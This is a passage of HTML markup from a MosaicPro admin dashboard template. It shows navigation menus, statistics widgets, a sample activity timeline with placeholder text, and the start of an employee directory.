<div class="clearfix"></div>
<!-- // Menu END -->
<div class="menu-hidden-element alert alert-primary">
<a class="close" data-dismiss="alert">×</a>
<p>Integer quis tempor mi. Donec venenatis dui in neque fringilla at iaculis libero ullamcorper. In velit sem, sodales id hendrerit ac, fringilla et est.</p>
</div>
</div>
<!-- // Scrollable Menu wrapper with Maximum Height END -->
</div>
<!-- // Sidebar Menu END -->
<!-- Content -->
<div id="content">
<!-- Top navbar -->
<div class="navbar main hidden-print">
<!-- Menu Toggle Button -->
<button type="button" class="btn btn-navbar pull-left visible-xs">
<span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span>
</button>
<!-- // Menu Toggle Button END -->
<!-- Not Blank page -->
<!-- Full Top Style -->
<ul class="topnav pull-left">
<li class="active"><a href="index.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons dashboard"><i></i> Dashboard</a></li>
<li class="dropdown dd-1">
<a href="" data-toggle="dropdown" class="glyphicons settings"><i></i>Components <span class="caret"></span></a>
<ul class="dropdown-menu pull-left">
<!-- Components Submenu Level 2 -->
<li class="dropdown submenu">
<a data-toggle="dropdown" class="dropdown-toggle">Forms</a>
<ul class="dropdown-menu submenu-show submenu-hide pull-right">
<li class=""><a href="form_wizards.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Form Wizards</a></li>
<li class=""><a href="form_elements.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Form Elements</a></li>
<li class=""><a href="form_validator.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Form Validator</a></li>
<li class=""><a href="file_managers.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">File Managers</a></li>
</ul>
</li>
<!-- // Components Submenu Level 2 END -->
<li class="dropdown submenu">
<a data-toggle="dropdown" class="dropdown-toggle">Tables</a>
<ul class="dropdown-menu submenu-show submenu-hide pull-right">
<li class=""><a href="tables.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Tables</a></li>
<li class=""><a href="tables_responsive.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Responsive Tables</a></li>
<li class=""><a href="pricing_tables.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Pricing tables</a></li>
</ul>
</li>
<!-- Components Submenu Regular Items -->
<li class=""><a href="ui.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">UI Elements</a></li>
<li class=""><a href="icons.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Icons</a></li>
<li class=""><a href="widgets.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Widgets</a></li>
<li class=""><a href="tabs.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Tabs</a></li>
<li class=""><a href="sliders.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Sliders</a></li>
<li class=""><a href="charts.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Charts</a></li>
<li class=""><a href="grid.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Grid system</a></li>
<li class=""><a href="notifications.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Notifications</span></a></li>
<li class=""><a href="modals.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Modals</a></li>
<li class=""><a href="thumbnails.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Thumbnails</a></li>
<li class=""><a href="carousels.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Carousels</a></li>
<li class=""><a href="image_crop.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Image Cropping</a></li>
<li class=""><a href="tour.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Page Tour</a></li>
<!-- <li class="dropdown submenu">
<a data-toggle="dropdown" class="dropdown-toggle">APIs</a>
<ul class="dropdown-menu submenu-show submenu-hide pull-right">
<li class=""><a href="twitter.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Twitter API</a></li>
<li class=""><a href="google_analytics.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Google Analytics API</a></li>
</ul>
</li> -->
<li class=""><a href="infinite_scroll.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Infinite Scroll</a></li>
<!-- // Components Submenu Regular Items END -->
<li class="dropdown submenu">
<a data-toggle="dropdown" class="dropdown-toggle glyphicons circle_info"><i></i>4 Level Menu</a>
<ul class="dropdown-menu submenu-show submenu-hide pull-right">
<li class="dropdown submenu">
<a data-toggle="dropdown" href="#" class="dropdown-toggle">Menu item</a>
<ul class="dropdown-menu submenu-show submenu-hide pull-right">
<li><a href="#">Menu item</a></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li class="dropdown dd-1">
<a href="" data-toggle="dropdown" class="glyphicons notes"><i></i>Pages <span class="caret"></span></a>
<ul class="dropdown-menu pull-left">
<li><a href="social.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons star"><i></i>Social</a></li>
<li><a href="timeline.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons history"><i></i>Timeline</a></li>
<li><a href="employees.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons group"><i></i>Employees</a></li>
<li class="dropdown submenu">
<a data-toggle="dropdown" class="dropdown-toggle glyphicons user"><i></i>Front</a>
<ul class="dropdown-menu submenu-show submenu-hide pull-right">
<li><a class="no-ajaxify" href="../front/index_slider.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Revolution Slider Fixed</a></li>
<li><a class="no-ajaxify" href="../front/index_slider_fullwidth.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Revolution Slider Wide</a></li>
<li><a class="no-ajaxify" href="../front/index.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Home page #1</a></li>
<li><a class="no-ajaxify" href="../front/index_2.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Home page #2</a></li>
<li><a class="no-ajaxify" href="../front/about.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">About us</a></li>
<li><a class="no-ajaxify" href="../front/pricing.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Pricing</a></li>
<li><a class="no-ajaxify" href="../front/blog.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Blog</a></li>
<li><a class="no-ajaxify" href="../front/blog_timeline.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Blog Timeline</a></li>
<li><a class="no-ajaxify" href="../front/shop.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Shop Catalog</a></li>
<li><a class="no-ajaxify" href="../front/shop_product.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Shop Product</a></li>
<li><a class="no-ajaxify" href="../front/shop_cart.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Shopping Cart</a></li>
<li><a class="no-ajaxify" href="../front/contact.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Contact</a></li>
<li><a class="no-ajaxify" href="../front/login.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Login</a></li>
<li><a class="no-ajaxify" href="../front/signup.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Sign up</a></li>
<li><a class="no-ajaxify" href="../front/error.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Error page</a></li>
</ul>
</li>
<li><a href="invoice.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons credit_card"><i></i>Invoice</a></li>
<li><a href="faq.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons circle_question_mark"><i></i>FAQ</a></li>
<li><a href="search.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons search"><i></i>Search</a></li>
<li><a href="ratings.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons star"><i></i>Ratings</a></li>
<li class="dropdown submenu">
<a data-toggle="dropdown" class="dropdown-toggle glyphicons user"><i></i>Account</a>
<ul class="dropdown-menu submenu-show submenu-hide pull-right">
<li class=""><a href="my_account_advanced.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Advanced profile</a></li>
<li class=""><a href="my_account.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">My Account</a></li>
<li><a href="login.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible"><i></i>Login</a></li>
<li><a href="signup.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible"><i></i>Register</a></li>
</ul>
</li>
<li class="dropdown submenu">
<a data-toggle="dropdown" class="dropdown-toggle glyphicons google_maps"><i></i>Maps</a>
<ul class="dropdown-menu submenu-show submenu-hide pull-right">
<li class=""><a class="no-ajaxify" href="maps_vector.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Vector maps</a></li>
<li class=""><a class="no-ajaxify" href="maps_google.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Google maps</a></li>
</ul>
</li>
<li class="dropdown submenu">
<a data-toggle="dropdown" class="dropdown-toggle glyphicons shopping_cart"><i></i>Online Shop</a>
<ul class="dropdown-menu submenu-show submenu-hide pull-right">
<li class=""><a href="shop_products.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Products</a></li>
<li class=""><a href="shop_edit_product.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Add product</a></li>
<li class=""><a href="shop_orders_timeline.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Orders Timeline</a></li>
</ul>
</li>
<li><a href="typography.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons font"><i></i>Typography</a></li>
<li><a href="gallery.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons picture"><i></i>Photo Gallery</a></li>
<li><a href="calendar.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons calendar"><i></i>Calendar</a></li>
<li><a href="bookings.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons user_add"><i></i>Bookings</a></li>
<li><a href="finances.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons coins"><i></i>Finances</a></li>
<li><a href="error.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons warning_sign"><i></i>Error page</a></li>
<li><a href="blank.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons magic"><i></i>Blank page</a></li>
</ul>
</li>
<li class="mega-menu">
<a href="#" class="glyphicons sheriffs_star"><i></i> Mega menu</a>
<div class="mega-sub">
<div class="mega-sub-inner">
<div class="row">
<div class="col-md-2">
<h4><i class="icon-book icon-fixed-width text-primary"></i> Learning</h4>
<ul class="icons-ul">
<li><a href="#"><span class="icon-li icon-arrow-right"></span> Catch the Bullet</a></li>
<li><a href="#"><span class="icon-li icon-arrow-right"></span> Snoopydoo</a></li>
<li><a href="#"><span class="icon-li icon-arrow-right"></span> Fallen Angel</a></li>
<li><a href="#"><span class="icon-li icon-arrow-right"></span> Sui Maker</a></li>
<li><a href="#"><span class="icon-li icon-arrow-right"></span> Wave Master</a></li>
<li><a href="#"><span class="icon-li icon-arrow-right"></span> Golf Pro</a></li>
</ul>
</div>
<div class="col-md-2">
<h4><i class="icon-wrench icon-fixed-width text-primary"></i> Utilities</h4>
<ul class="icons-ul">
<li><a href="#"><span class="icon-li icon-arrow-right"></span> Gadget Finder</a></li>
<li><a href="#"><span class="icon-li icon-arrow-right"></span> Green Tree Express</a></li>
<li><a href="#"><span class="icon-li icon-arrow-right"></span> Green Tree Pro</a></li>
<li><a href="#"><span class="icon-li icon-arrow-right"></span> Wobbler 3.0</a></li>
<li><a href="#"><span class="icon-li icon-arrow-right"></span> Coolkid</a></li>
</ul>
</div>
<div class="col-md-3">
<h4><i class="icon-android icon-fixed-width text-primary"></i> Education</h4>
<ul class="icons-ul">
<li><a href="#"><span class="icon-li icon-arrow-right"></span> Learn Thai</a></li>
<li><a href="#"><span class="icon-li icon-arrow-right"></span> Math Genius</a></li>
<li><a href="#"><span class="icon-li icon-arrow-right"></span> Chemokid</a></li>
</ul>
<h4><i class="icon-apple icon-fixed-width text-primary"></i> Professionals</h4>
<ul class="icons-ul">
<li><a href="#"><span class="icon-li icon-arrow-right"></span> Success 1.0</a></li>
<li><a href="#"><span class="icon-li icon-arrow-right"></span> Moneymaker</a></li>
</ul>
</div>
<div class="col-md-5">
<div class="innerTB innerR">
<div class="glyphicons glyphicon-xlarge glyphicon-top sheriffs_star glyphicon-primary">
<i></i>
<h4>Support for any type of content</h4>
<p class="margin-none">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an
<br> <a href="">learn more</a>
</p>
</div>
</div>
</div>
</div>
</div><!-- /cbp-hrsub-inner -->
</div><!-- /cbp-hrsub -->
</li>
</ul>
<!-- // Full Top Style END -->
<!-- // Not Blank Page END -->
<!-- Top Menu Right -->
<ul class="topnav pull-right hidden-sm">
<!-- Themer -->
<li><a href="#themer" data-toggle="collapse" class="glyphicons eyedropper single-icon"><i></i></a></li>
<!-- // Themer END -->
<!-- Language menu -->
<li class="hidden-xs dropdown dd-1 dd-flags" id="lang_nav">
<a href="#" data-toggle="dropdown"><img src="../../../../../common/theme/images/lang/en.png" alt="en" /></a>
<ul class="dropdown-menu pull-right">
<li class="active"><a href="?module=admin&page=index&url_rewrite=&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&sidebar_type=collapsible&sidebar-sticky=false&top-sticky=false&lang=en" title="English"><img src="../../../../../common/theme/images/lang/en.png" alt="English"> English</a></li>
<li><a href="?module=admin&page=index&url_rewrite=&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&sidebar_type=collapsible&sidebar-sticky=false&top-sticky=false&lang=ro" title="Romanian"><img src="../../../../../common/theme/images/lang/ro.png" alt="Romanian"> Romanian</a></li>
<li><a href="?module=admin&page=index&url_rewrite=&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&sidebar_type=collapsible&sidebar-sticky=false&top-sticky=false&lang=it" title="Italian"><img src="../../../../../common/theme/images/lang/it.png" alt="Italian"> Italian</a></li>
<li><a href="?module=admin&page=index&url_rewrite=&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&sidebar_type=collapsible&sidebar-sticky=false&top-sticky=false&lang=fr" title="French"><img src="../../../../../common/theme/images/lang/fr.png" alt="French"> French</a></li>
<li><a href="?module=admin&page=index&url_rewrite=&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&sidebar_type=collapsible&sidebar-sticky=false&top-sticky=false&lang=pl" title="Polish"><img src="../../../../../common/theme/images/lang/pl.png" alt="Polish"> Polish</a></li>
</ul>
</li>
<!-- // Language menu END -->
<!-- Profile / Logout menu -->
<li class="account dropdown dd-1">
<a data-toggle="dropdown" href="my_account_advanced.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons logout lock"><span class="hidden-md hidden-sm hidden-desktop-1">mosaicpro</span><i></i></a>
<ul class="dropdown-menu pull-right">
<li><a href="my_account_advanced.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons cogwheel">Settings<i></i></a></li>
<li><a href="my_account_advanced.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons camera">My Photos<i></i></a></li>
<li class="profile">
<span>
<span class="heading">Profile <a href="my_account_advanced.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="pull-right text-primary text-weight-regular">edit</a></span>
<a href="my_account_advanced.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="img thumb">
<img src="../../../../../common/theme/images/avatar-51x51.jpg" alt="Avatar" />
</a>
<span class="details">
<a href="my_account_advanced.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="strong text-regular">Mosaic Pro</a>
contact@mosaicpro.biz
</span>
<span class="clearfix"></span>
</span>
</li>
<li>
<span>
<a class="btn btn-default btn-mini pull-right" href="login.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Sign Out</a>
</span>
</li>
</ul>
</li>
<!-- // Profile / Logout menu END -->
</ul>
<!-- // Top Menu Right END -->
<ul class="topnav pull-right hidden-sm">
<li><a href="" class="glyphicons envelope single-icon"><i></i><span class="badge fix badge-primary">5</span></a></li>
<li><a href="" class="glyphicons cup single-icon"><i></i><span class="badge fix badge-primary">7</span></a></li>
<li class="hidden-sm"><a href="" class="glyphicons comments single-icon"><i></i><span class="badge fix badge-primary">3</span></a></li>
</ul>
<div class="clearfix"></div>
</div>
<!-- Top navbar END -->
<div class="innerL innerT">
<div class="widget-search form-inline">
<div class="input-group">
<input type="text" value="" class="form-control" placeholder="Type your keywords ..">
<span class="input-group-btn">
<button type="button" class="btn btn-primary">Search <i class="icon-search"></i></button>
</span>
</div><!-- /input-group -->
</div>
</div>
<h1>Dashboard</h1>
<!-- Stats Widgets -->
<div class="row border-top innerL ">
<div class="col-md-3 border-right innerAll">
<div class=" padding-bottom-none-phone">
<a href="" class="widget-stats widget-stats-default widget-stats-4">
<span class="txt">Ratings</span>
<span class="count">4.3</span>
<span class="glyphicons cup"><i></i></span>
<div class="clearfix"></div>
<i class="icon-play-circle"></i>
</a>
</div>
</div>
<div class="col-md-3 border-right innerAll">
<div class=" padding-bottom-none-phone">
<a href="" class="widget-stats widget-stats-primary widget-stats-4">
<span class="txt">Progress</span>
<span class="count">58%</span>
<span class="glyphicons refresh"><i></i></span>
<div class="clearfix"></div>
<i class="icon-play-circle"></i>
</a>
</div>
</div>
<div class="col-md-3 border-right innerAll">
<div class=" padding-bottom-none-phone">
<a href="" class="widget-stats widget-stats-gray widget-stats-4">
<span class="txt">Signups</span>
<span class="count">3<span>Today</span></span>
<span class="glyphicons user"><i></i></span>
<div class="clearfix"></div>
<i class="icon-play-circle"></i>
</a>
</div>
</div>
<div class="col-md-3">
<div class=" padding-bottom-none-phone">
<a href="" class="widget-stats widget-stats-2">
<span class="count">30</span>
<span class="txt">Bookings</span>
</a>
</div>
</div>
</div>
<!-- // Stats Widgets END -->
<div class="row border-top border-bottom innerLR">
<div class="col-md-4">
<div class="widget widget-heading-simple widget-body-white widget-flat">
<div class="widget-body">
<div class="glyphicons glyphicon-top display">
<i></i>
<h4>Large Top Icons</h4>
<p class="margin-none">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an
<br> <a href=""><span class="text-underline">learn more</span> <span class="icon-circle-arrow-right"></span></a></p>
</div>
</div>
</div>
</div>
<div class="col-md-4 padding-none border-right">
<div class="widget widget-heading-simple widget-body-gray margin-none widget-flat">
<div class="widget-body">
<h4 class="strong"><i class="icon-user text-primary icon-fixed-width"></i> Uber Friendly</h4>
<div class="separator bottom"></div>
<div class="glyphicons glyphicon-xlarge user hidden-tablet-partial">
<i class="hidden-md"></i>
<h4>Gray Background</h4>
<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since.
</p>
<p> <a href=""><span class="text-underline">learn more</span> <span class="icon-circle-arrow-right"></span></a></p>
</div>
</div>
</div>
</div>
<div class="col-md-4 innerT">
<h4 class="strong separator bottom"><i class="icon-bolt text-primary icon-fixed-width"></i> Spectacular</h4>
<table class="table table-striped table-condensed table-borderless">
<tbody>
<tr>
<td>5 Orders</td>
<td>3 Bookings</td>
<td>7 Signups</td>
</tr>
<tr>
<td>5 Orders</td>
<td>3 Bookings</td>
<td>7 Signups</td>
</tr>
<tr>
<td>5 Orders</td>
<td>3 Bookings</td>
<td>7 Signups</td>
</tr>
</tbody>
</table>
<a href=""><span class="text-underline">view all</span> <i class="icon-circle-arrow-right"></i></a>
</div>
</div>
<div class="heading-buttons">
<h2 class="heading pull-left"><i class="icon-bar-chart icon-fixed-width text-primary"></i> Website Traffic</h2>
<div class="buttons">
<a href="google_analytics.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="btn btn-primary">Google Analytics API</a>
</div>
<div class="clearfix"></div>
</div>
<div class="innerLR innerT">
<!-- Website Traffic Chart -->
<div class="widget widget-body-gray">
<div class="widget-body">
<div id="chart_simple" style="height: 253px;"></div>
</div>
</div>
<!-- // Website Traffic Chart END -->
</div>
<p class="separator text-center"><i class="icon-ellipsis-horizontal icon-3x"></i></p>
<div class="innerLR innerB">
<div class="row">
<div class="col-md-9 tablet-column-reset">
<h2 class="margin-none separator bottom"><i class="icon-sitemap text-primary icon-fixed-width"></i> Timeline</h2>
<div class="relativeWrap overflow-hidden">
<div class="row border-bottom layout-timeline layout-timeline-mirror">
<div class="col-md-6"></div>
<div class="col-md-6">
<ul class="timeline">
<li class="active">
<div class="separator bottom">
<span class="date box-generic">Now</span>
<span class="type glyphicons suitcase">Task <i></i><span class="time">08:00</span></span>
<button type="button" class="glyphicons circle_plus btn btn-primary btn-icon btn-small"><i></i>Add event</button>
</div>
<div class="widget widget-heading-simple widget-body-white margin-none">
<div class="widget-body">
<div class="media">
<div class="media-object pull-left thumb"><img src="../../../../../common//theme/images/avatar-51x51.jpg" alt="Image" /></div>
<div class="media-body">
<a class="author">Adrian Demian</a><br/>
<span class="muted">adrian@ennovation.ie</span>
</div>
</div>
<div class="alert alert-gray">
<p class="glyphicons circle_info margin-none"><i></i> Added a new milestone named <a href="">MosaicPro</a></p>
</div>
<a class="glyphicons single pencil"><i></i></a>
</div>
</div>
</li>
<li class="active">
<span class="type glyphicons comments">Comment <i></i><span class="time">11:00</span></span>
<div class="widget widget-heading-simple widget-body-white margin-none">
<div class="widget-body">
<p class="glyphicons user margin-none"><i></i> <strong><a href="">MosaicPro</a> said</strong>: Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an ...</p>
</div>
</div>
</li>
<li>
<div class="separator">
<span class="date box-generic"><strong>27</strong>may</span>
<span class="type glyphicons picture">Photo <i></i><span class="time">08:00</span></span>
</div>
<div class="widget widget-heading-simple widget-body-white margin-none">
<div class="widget-body">
<div class="media">
<div class="media-object pull-left thumb"><img src="../../../../../common//theme/images/avatar-51x51.jpg" alt="Image" /></div>
<div class="media-body">
<a class="author">Adrian Demian</a><br/>
<span class="muted">adrian@ennovation.ie</span>
</div>
</div>
<div class="alert alert-gray">
<p class="glyphicons circle_info"><i></i> Added photos to the album <a href="">MosaicPro</a></p>
<!-- Gallery Layout -->
<div class="gallery gallery-2">
<ul class="row" data-toggle="modal-gallery" data-target="#modal-gallery" id="gallery-4" data-delegate="#gallery-4">
<li class="col-md-2 hidden-sm"><a class="thumb" href="../../../../../common/theme/images/gallery-2/6.jpg" data-gallery="gallery"><img width="46" height="31" style="width: 46px; height: 31px;" src="../../../../../common/theme/images/gallery-2/6.jpg" alt="photo" /></a></li>
<li class="col-md-2 hidden-sm"><a class="thumb" href="../../../../../common/theme/images/gallery-2/5.jpg" data-gallery="gallery"><img width="46" height="31" style="width: 46px; height: 31px;" src="../../../../../common/theme/images/gallery-2/5.jpg" alt="photo" /></a></li>
<li class="col-md-2 hidden-sm"><a class="thumb" href="../../../../../common/theme/images/gallery-2/4.jpg" data-gallery="gallery"><img width="46" height="31" style="width: 46px; height: 31px;" src="../../../../../common/theme/images/gallery-2/4.jpg" alt="photo" /></a></li>
<li class="col-md-2"><a class="thumb" href="../../../../../common/theme/images/gallery-2/3.jpg" data-gallery="gallery"><img width="46" height="31" style="width: 46px; height: 31px;" src="../../../../../common/theme/images/gallery-2/3.jpg" alt="photo" /></a></li>
<li class="col-md-2"><a class="thumb" href="../../../../../common/theme/images/gallery-2/2.jpg" data-gallery="gallery"><img width="46" height="31" style="width: 46px; height: 31px;" src="../../../../../common/theme/images/gallery-2/2.jpg" alt="photo" /></a></li>
<li class="col-md-2"><a class="thumb" href="../../../../../common/theme/images/gallery-2/1.jpg" data-gallery="gallery"><img width="46" height="31" style="width: 46px; height: 31px;" src="../../../../../common/theme/images/gallery-2/1.jpg" alt="photo" /></a></li>
</ul>
</div>
<!-- // Gallery Layout END -->
</div>
<a class="glyphicons single pencil"><i></i></a>
</div>
</div>
</li>
</ul>
</div>
</div>
</div>
<div class="separator bottom"></div>
<p class="separator text-center"><i class="icon-ellipsis-horizontal icon-3x"></i></p>
<!-- Widget -->
<h2 class="margin-none separator bottom"><i class="icon-group text-primary icon-fixed-width"></i> Employee Directory</h2>
<div class="widget widget-heading-simple widget-body-gray widget-employees">
<div class="widget-body padding-none">
<div class="row">
<div class="col-md-4 listWrapper">
<div class="innerAll">
<form autocomplete="off" class="form-inline">
<div class="widget-search separator bottom">
